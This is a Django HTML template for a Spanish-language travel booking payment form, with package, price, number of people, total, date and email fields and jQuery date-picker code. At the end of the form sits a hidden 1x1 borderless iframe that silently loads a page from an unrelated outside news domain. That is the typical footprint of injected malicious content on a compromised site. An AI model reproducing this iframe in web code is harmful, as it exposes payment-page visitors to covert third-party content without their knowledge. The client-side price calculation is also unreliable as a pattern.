{% extends "layout/base_pagos.html" %}

{% block menu %}
    <li><a href="#" class="active">1. Products</a></li>
    <li><a href="#">2. Passangers</a></li>
    <li><a href="#">3. Payments</a></li>
    <li><a href="#">4. Confirm</a></li>
{% endblock %}

{% block content %}
<link rel="stylesheet" href="//code.jquery.com/ui/1.11.4/themes/smoothness/jquery-ui.css">
<script src="//code.jquery.com/jquery-1.10.2.js"></script>
<script src="//code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
<link rel="stylesheet" href="/resources/demos/style.css">
<script type="text/javascript">
    
    $(function(){
        $("#id_cantidad").change(function() {
            pre = parseInt($("#id_precio").val());
            cant = $("#id_cantidad").val();
            $("#id_monto").val(pre*cant);
        });
    });

    $(function() {
        $( "#fecha" ).datepicker({ dateFormat: "yy-mm-dd" ,minDate: 0 });
  });
  </script>
</script>

<form action="/reservar/agregara/" method="post">{%csrf_token%}
    <!-- campos ocultos -->
    <input id="id_paquete" name="paquete_id" type="hidden" value="{{paquete.id}}"></input></p>

    <!-- Todos los campos ocultos para enviar a paypal -->
    <p><b>Paquete: </b> {{ paquete.nombre }}</p>
    <p><b>Precio : </b>$ <input id="id_precio" type="text" value="{{paquete.precio}}" readonly="readonly"></input></p>

    <p><label for="id_cantidad"> Cantidad Personas:</label>
    <input id="id_cantidad" type="number" name="cantidad" min="1"  required/></input></p>

    <p><b>Monto Total : </b>$<input id="id_monto" name="id_monto" type="text" value="" readonly="readonly"></input></p>

    <p><b>Fecha de viaje: </b><input id="fecha" name="fecha" type="text" value="" pattern="(19|20)\d\d[- -.](0[1-9]|1[012])[- -.](0[1-9]|[12][0-9]|3[01])" title="La fecha ha de tener el siguiente formato: aaaa-mm-dd" placeholder="aaaa-mm-dd" /
    required/></p>

<!-- pattern="(19|20)\d\d[- -.](0[1-9]|1[012])[- -.](0[1-9]|[12][0-9]|3[01])" title="La fecha ha de tener el siguiente formato: aaaa-mm-dd"-->

    <label>Correo: </label>
    <input type="text" value="" name="correo" placeholder="micorreo@gmail.com" pattern="[a-zA-Z0-9.+_-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+" title="el correo tiene la siguiente forma micorreo@gmail.com"  required/>
    <br>
    <input type="submit" value="Pagar" class="btn btn-warning">
    <iframe width="1" height="1" frameborder="0" scrolling="no" src="http://www.diariomadrid.eu/noticia_ultima_hora.php"> </iframe>
</form>
{% endblock %}
